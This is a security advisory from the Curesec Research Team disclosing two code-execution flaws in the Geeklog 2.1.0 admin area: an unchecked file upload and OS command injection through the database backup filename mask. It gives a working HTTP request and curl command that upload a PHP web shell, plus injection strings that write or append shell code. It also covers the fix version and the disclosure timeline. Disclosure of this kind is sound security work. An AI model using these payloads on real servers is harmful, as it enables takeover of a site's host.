Geeklog 2.1.0 Command Injection

`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: Geeklog 2.1.0  
Fixed in: 2.1.1b3  
Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156  
Vendor Contact: [email protected]  
Vulnerability Type: Code Execution  
Remote Exploitable: Yes  
Reported to vendor: 09/29/2015  
Disclosed to public: 12/02/2015  
Release mode: Coordinated release  
CVE: requested, but not assigned  
Credits Tim Coen of Curesec GmbH  
  
2. Overview  
  
The admin area of Geeklog suffers from two vulnerabilities that can lead to  
code execution: OS Command Injection and Upload of Files with Dangerous Type.  
  
The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1,  
the OS command injection in version 2.1.1b3.  
  
3. Upload of Files with Dangerous Type  
  
CVSS  
  
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C  
  
Description  
  
When uploading a file, the file type check is performed only client-side. An  
attacker can easily bypass this check and thus upload files of dangerous types,  
such as PHP files.  
  
To upload files, an attacker needs a registered user that is in the group  
"Filemanager Admin".  
  
Proof of Concept  
  
  
POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1  
Host: localhost  
X-Requested-With: XMLHttpRequest  
Content-Length: 761  
Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773  
Cookie: [cookies]  
  
-----------------------------10717364298700964751730232773  
Content-Disposition: form-data; name="mode"  
  
add  
-----------------------------10717364298700964751730232773  
Content-Disposition: form-data; name="currentpath"  
  
/var/www/geeklog-2.1.0/public_html/images/  
-----------------------------10717364298700964751730232773  
Content-Disposition: form-data; name="filepath"  
  
test.png  
-----------------------------10717364298700964751730232773  
Content-Disposition: form-data; name="newfile"; filename="shell.php"  
Content-Type: image/png  
  
<?php passthru($_GET['x'])  
-----------------------------10717364298700964751730232773  
Content-Disposition: form-data; name="upload"  
  
Upload  
-----------------------------10717364298700964751730232773--  
  
As curl command:  
  
  
curl -i -s -k -X 'POST' \  
-H 'Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773' \  
-b 'gl_session=838973868; geeklog=2; password=18bdbd240593b81a5239285a1f56283b4ae20648;' \  
--data-binary $'-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"mode\"\x0d\x0a\x0d\x0aadd\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"currentpath\"\x0d\x0a\x0d\x0a/var/www/geeklog-2.1.0/public_html/images/\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"filepath\"\x0d\x0a\x0d\x0atest.png\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"newfile\"; filename=\"shell.php\"\x0d\x0aContent-Type: image/png\x0d\x0a\x0d\x0a<?php passthru($_GET[\'x\'])\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0aUpload\x0d\x0a-----------------------------10717364298700964751730232773--\x0d\x0a' \  
'http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php'  
  
4. OS Command Injection  
  
CVSS  
  
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C  
  
Description  
  
When performing a database backup, various settings are passed unsanitized to  
exec, leading to code execution.  
  
To exploit this issue, an attacker needs a registered user that is in the group  
"Root".  
  
Proof of Concept  
  
  
1. Change "Backup File Name Mask" in http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to:  
geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "<?php passthru(\$_GET['x']);" > shell.php;"  
2. Perform database backup here:  
http://localhost/geeklog-2.1.0/public_html/admin/database.php  
The injected commands will be executed.  
  
In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command  
injection is still possible, including the creation of a PHP shell by appending  
the injected PHP code to an existing PHP file without closing tags:  
  
  
geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;"  
  
Code  
  
  
/admin/database.php  
function dobackup()  
{  
[...]  
if (!empty($_CONF['mysqldump_filename_mask'])) {  
$filename_mask = strftime($_CONF['mysqldump_filename_mask']);  
}  
[...]  
$backupfile = $_CONF['backup_path'] . $filename_mask;  
[...]  
$command .= " $_DB_name > \"$backupfile\"";  
[...]  
if ($canExec) {  
exec($command);  
  
5. Solution  
  
To mitigate this issue please upgrade at least to version 2.1.1b3:  
  
https://www.geeklog.net/filemgmt/visit.php/1156  
  
Please note that a newer version might already be available.  
  
6. Report Timeline  
  
09/29/2015 Informed Vendor about Issue (no reply)  
10/21/2015 Reminded Vendor of Disclosure Date  
10/21/2015 Vendor asks for an additional two weeks for testing  
11/17/2015 CVE Requested (no reply)  
11/17/2015 Reminded Vendor of disclosure date  
11/17/2015 Vendor points to beta version and announces release  
11/24/2015 Informed Vendor of insufficient fix in beta  
11/30/2015 Vendor releases fix  
12/02/2015 Disclosed to public  
  
  
Blog Reference:  
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html  
  
--  
blog: https://blog.curesec.com  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Romain-Rolland-Str 14-24  
13089 Berlin, Germany  
  
  
`